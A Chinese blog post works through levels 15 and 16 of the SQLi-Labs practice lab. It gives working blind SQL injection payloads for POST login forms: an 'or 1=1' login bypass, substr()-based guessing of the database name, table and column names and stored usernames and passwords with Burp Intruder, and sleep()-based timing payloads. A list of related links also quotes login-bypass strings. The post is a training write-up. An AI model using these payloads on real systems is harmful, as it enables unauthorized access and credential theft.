Sqlilabs Less15-16

最新推荐文章于 2024-05-17 07:35:34 发布
最新推荐文章于 2024-05-17 07:35:34 发布
阅读量303 收藏
点赞数 1
分类专栏: Sqli Labs 文章标签: 大数据 网络安全 web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45785324/article/details/125747488
版权

第十五关

 POST类型单引号基于时间的布尔盲注

1.判断注入点

username输入a,password输入123,进不去

根据提示在a后面加上’# ,还是进不去,因为此时的账户是错的,不是a

尝试加上or 1=1永真句,成功进入

 2.抓库名及长度

  uname=a' or  substr((database()),1,1) = 'a' #&passwd=123&submit=Submit

  通过burpsuit抓包

  右键发送给测试器,然后关闭拦截请求

 清除变量,在1和a两边分别添加添加图中两个变量,选择集束炸弹

 有效载荷里载入密码字典,1载0-9,2载a-z

 

点击开始攻击,攻击结果如下

 3.抓表名

uname=a' or  substr((select group_concat(table_name) from information_schema.tables where table_schema = 'security'),1,1) = 'a' #&passwd=123&submit=Submit

同库名处理一样,在有效载荷1那里载入1-30

4.抓列名

uname=a' or  substr((select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table name = 'users'),1,1) = 'a' #&passwd=123&submit=Submit

5.抓数据

uname=a' or  substr((select group_concat(id,username,password) from users),1,1) = 'a' #&passwd=123&submit=Submit

抓包处理,在有效载荷1载入1-100,在有效载荷那里载入1-14及a-z,A-Z(有的密码不完整,因为没有加入! - @ 等特殊字符)

 

 第十六关

 POST类型基于双引号的时间布尔盲注

1.判断注入点

username输入a,password输入123,点击submit,根据提示加上有了十五关的经验,在POST data修改为uname=a" or 1=1#&passwd=123&submit=Submit发现不行,尝试在双引号后面加上括号,uname=a") or 1=1#&passwd=123&submit=Submit,成功进入

2.判断库长度

uname=a") or sleep(if(length(database())>7,0,2))#&passwd=123&submit=Submit

长度为7时不延时

 uname=a") or sleep(if(length(database())>8,0,2))#&passwd=123&submit=Submit

 长度为8时,发现延时,判断数据库长度为8

3.判断库名

uname=a") or sleep(if(ascii(substring(database(),1,1))>114 ,0,5))#&passwd=123&submit=Submit

 当ascll码值为114时,发现不延时

uname=a") or sleep(if(ascii(substring(database(),1,1))>115 ,0,5))#&passwd=123&submit=Submit

 当ascll码值为115时,发现延时,查表判断第一个字母为s由于这个方法太过繁琐,极力不推荐,这里就不一一赘述了,推荐用15关的方法或者sqlmap解决。

xiao飞仔
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
SQLi-LABS Page-1(Basic Challenges)
07-24
在这个挑战中,从Less-1到Less-5,每一关都涉及不同的注入点和策略。例如: 1. **Less-1** 是一个基础的SQL注入实例,它展示了如何利用单引号来触发错误并揭示SQL结构。通过观察错误信息,学习者可以识别注入点并...
sqli-labs/Less-15
m0_71299382的博客
11-18 500
sqli-labs第十五关
sqlilabs less15~16
TA不懒,但还没有添加简介
07-02 327
sqlilabs less15
sqli-labs-Less-15 时间盲注
feng的博客
09-24 473
sqli-labs的这几题是post注入,之前的几天用万能密码都可以过,但是这题用了各种方式都没回显,因此判断是时间盲注。 关于万能密码,这里引用一下郁离歌大佬的: 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or' 11:1 or '1'='1'=1 12:1 or '1'='1' or 1=1 13: 'O
sqli-labs-less-15 post布尔盲注+sqlmap爆破
yzcn
11-12 854
Less-15 方法一: Post传参,先用burp suite抓包 判断闭合方式: uname=’ or 1=1 #&passwd=&submit=Submit 显示登录成功,闭合方式为’’ uname=’) or 1=1 #&passwd=&submit=Submit 添加符号后没有报错信息,直接返回登录失败,说明这题只有正确或者错误两种返回,可以使用布尔盲注进行注入。 Substr(a,b,c):从位置b开始截取a字符中的前c个字符 判断当前数据库名长度: u
关于sqli-lab Less-15使用 or 而不是 and 解析
m0_62879498的博客
12-11 412
按照以往思路,尝试一下报错的手段,发现并没有输出报错的语句,查看源码,发现确实没有输出语句(所以考虑使用盲注的手法) (以15题为例) 判断数据库长度:’or (length(database()))=8-- q 判断数据库名字:'or (ascii(substr(database(),1,1)))=115-- q 判断表的名字:'or (ascii(substr((select table_name from information_schema.tables where table_sche
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
SQLilabs前15关指北
Ms08067安全实验室
03-15 188
文章来源 | MS08067Web零基础1期作业本文作者:tyrant(Web零基础1期学员)SQLILABS-LESS-1通过文字提示,需要传递一个ID参数。通过get 方式提交后如下图:1、对id参数进行测试,看看能否发现注入漏洞。127.0.0.1/sqlilabs/Less-1/?id=3'")有提示说在'")' LIMIT 0,1'附近发生了错误。通过构造的参数可以猜测出:SQL查询语...
Sqli-labs 1-15
plant1234的博客
12-12 2105
Less-1 基于单引号的字符型注入 注入语句: id=1' and 1=1 -- a 1、判断注入点: 2、把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 3、确定注入字符后,判断有多少列, 超出列数会报错 id=1' order by 4 -- - 4、判断数据显示点 (id一定要改为不存在的数) id=520' union select 1,database(),3 -- - 5、然后便可在注入字符后加入前面的sql注入基本语句报出数据库信息了 less-2——正
sqli-labs 15-19通关
weixin_52029251的博客
04-18 215
sqli 不管输入什么都没有回显 查看源码 发现报错语句都被注释掉了,抓包使用延时注入试试 发送之后十秒之后才给回应,明显注入成功。 第十六关 和第十五关大同小异 ,只不过是闭合方式不同 闭合方式") 第十七关 还是输入什么都没有回显,查看源码 从源码可以看出只能从passwd注入 对password注入发现回显 之后使用updatexml()进行注入就可以了 第十八关 这关将username和password都进行了过滤,查看源码之后发现有user..
SQLi LABS Less 15 布尔盲注_sqli-labs 15 为何 要输入 用户名(1)
最新发布
2401_84264727的博客
05-17 604
朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~使用万能账号登录成功后,页面不会动态返回数据(返回写死的图片),无法使用联合注入。字符的ASCLL码肯定大于1,页面正常显示(登录成功),确定payload可用。测试成功后,再按照此方法测试其余字符,人工测试效率较低,稍后使用脚本自动化枚举。长度肯定大于1,页面正常显示(登录成功),确定payload可用。参数中添加引号,页面不显示数据库的报错信息,报错注入无法使用。
Sqli-labs之Less-15和Less-16
→_→
04-08 2170
Less-15 基于布尔型/时间延迟单引号POST型盲注 测试: ?id=1uname=1&passwd=1uname=1&passwd=1 ?id=1'...
sqli-labs (less15-less16)
Xi4or0uji
07-31 1025
less 15 post方法单引号时间盲注 这关跟之前的get方法的盲注差不多,具体就不多解释了,因为后台的查询语句是select xxx from "table_name" where uname='$_POST["uname"]' and passwd='$_POST["passwd"]' 所以只要构造uname=admin'绕过就行了 贴个爆数据库的脚本,其他的改下sql语句就能用了...
sqli-labs靶场第十五关
gou1791241251的博客
12-27 947
第十五关没什么特殊的,只是单引号闭合而已。
sqli-labs靶场15-19过关笔记
weixin_62884797的博客
04-16 717
15 我们按照老办法,输入单引号查看回显信息,但没有到没有,显然,他极有可能是无回显报错,那就是盲注了。 先bp抓包 发现他是post的请求,我们就在bp中改包注入一下 admin' and 1=1 23% 发现登陆成功,确实有注入点,但是无回显,我们就需要盲注了。 uname=admin' and sleep(5) 23%&passwd=admin&submit=Submit 在bp中,我们等了一会儿他回显的,我们可以确定,可以使用时间盲注了。 uname=adm
sqli-labs的第15关的布尔脚本(附代码分析)
skoyine的博客
05-02 1463
sqli-labs的第15关布尔盲注脚本 因为最近在复习python,所以找个项目练练手,本人是个菜鸡,代码哪里有问题欢迎大佬指出 import requests import time host = "http://127.0.0.1/sqli-labs/Less-15/" def getDatabase(): # 获取数据库名 global host ans = '' # 最外面的循环是数据库名的字符长度,就是从第几个字符开始
sqli-labs-less-7
09-26
sqli-labs less-7是一个web注入实验,它是用来学习SQL注入的。在这个实验中,我们需要使用不同的注入技术来绕过应用程序的安全措施,并从数据库中获取敏感信息。在这个具体的题目中,我们需要使用UNION SELECT语句来实现注入。 根据引用和引用提供的信息,我们可以得出以下步骤: 1. 构造注入语句:在URL参数中使用单引号来闭合原始查询,然后使用UNION SELECT语句来执行额外的SQL查询。在这个例子中,注入语句是?id=-1')) union select 1,user(),database()。 2. 将查询结果导出到文件中:使用INTO OUTFILE语句将注入的查询结果导出到指定的文件路径。在这个例子中,查询的结果将被导出到文件"E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt"中。 通过这些步骤,我们可以成功执行SQL注入攻击,并将查询结果保存到指定的文件中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值